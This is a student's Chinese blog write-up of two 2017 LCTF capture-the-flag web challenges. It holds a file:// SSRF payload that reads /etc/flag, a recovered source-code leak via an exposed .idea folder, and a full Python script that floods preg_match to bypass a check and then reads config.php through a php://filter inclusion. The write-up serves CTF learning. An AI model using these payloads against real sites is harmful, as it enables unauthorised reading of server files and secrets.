2018-01-15

2017 LCTF 学习体会

1. web签到题：

用file协议可以读取本地文件

要绕过逻辑中对host的检查，需要用到curl命令，curl支持file://host/path, file://path 这两种形式，都会访问到本地文件

截断url后面拼接的/, GET请求，用?#都可以

Payload：

  file://www.baidu.com/etc/flag?

LCTF{1eTus_q14ndao_B4_387t439hg9342}

之前自己做的时候想到本地代理一般都是设置为127.0.0.1:8080, 试过之后发现不行，查询之后发现它只是本机的一个回送地址，不进行网络传输

2. 萌萌哒的报名系统：

这题提示给了IDE，从大佬的wp中知道PHP有款强大的IDE叫做PHPSTORM，它新建项目时会产生一个.idea文件夹，payload: http://123.206.120.239/.idea/ 访问文件夹

发现有一个xdcms2333.zip, payload: http://123.206.120.239/xdcms2333.zip? 下载这个压缩包，打开得到整站源码:

查看了login.php和member.php 没有发现什么有用的东西，看register.php 时, 有以下两处关键代码:

$admin = "xdsec"."###".str_shuffle('you_are_the_member_of_xdsec_here_is_your_flag');

preg_match('/^(xdsec)((?:###|\w)+)$/i', $code, $matches);

如果匹配了$matches[0]=$admin,就可以把xdsec注册到identities表中去，这样我们就可以绕过member.php中的:

$sth->execute([':username' => $_SESSION['username']]);

    if ($sth->fetch()[0] === 'GUEST') {

        $_SESSION['is_guest'] = true;

}

  但是str_shuffle是不可预测的。所以要另找方法，很多人用的非预期解—条件竞争，如果在identities表中没有username这一行数据，那么取出来$sth->fetch[0]的结果就为null，可绕过第一层，所以可以用Python多线程注册用户，（没试过）。

其实正解是通过pre_match函数的资源消耗来绕过，喂给pre_match一个很长的字符串，会导致pre_match消耗大量资源从而导致后面的php不会执行。

脚本如下：

# !/usr/bin/env python

# -*- coding: utf-8 -*-

import requests

import threading

import re

import os

__author__ = "hahahha"

s = requests.session()

url = 'http://123.206.120.239/'

url1 = url+'register.php'

url2 = url+'login.php'

url3 = url+'member.php?file=php://filter/resource=config.php'

headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'}

def register():

    data = {

        'username':'Asdfgh',

        'password':'123456',

        'code':'xdsec###'+'A'*1000000

        }

    try:

        res1=s.post(url1,headers=headers,data=data,timeout=10)

        print (res1.text)

    except:

        pass

def login():

    data = {

        'username':'Asdfgh',

        'password':'123456'

        }

    res2=s.post(url2,headers=headers,data=data)

    print (res2.text)

def member():

    res3 = s.get(url3,headers=headers)

    print (res3.text)

if __name__=='__main__':

    register()

    login()

    member()

脚本是看别人的，在这里也总结一下，一般的应该怎么写:

Requests是Python的第三方库，需要自己下载安装才能使用，这次用到的是web提交的基本使用，requsets.session()是一个会话，requests.session().post(url,headers,data,timeout), 其中headers只把User-Agent 添加进去就行了，不过要添加完整，我做的时候就复制少了，所以一直出不来，print（res.txet）打印的内容要规范一点，最好别用（res.content）。

经过这道题，我觉得我要学的东西还很多，PHP代码审计，正则表达式是很重要的，等Python的老师讲有点等不及了，先自己看看吧，再实践实践，Python也用得不是很熟。加油吧，少年！

注：自己实在是太菜，复现都只能做出两道题来，唉唉唉！最近刚半期考完，数电成绩很不理想，英语六级也快要考了，花在这方面的时间可能会要少一点。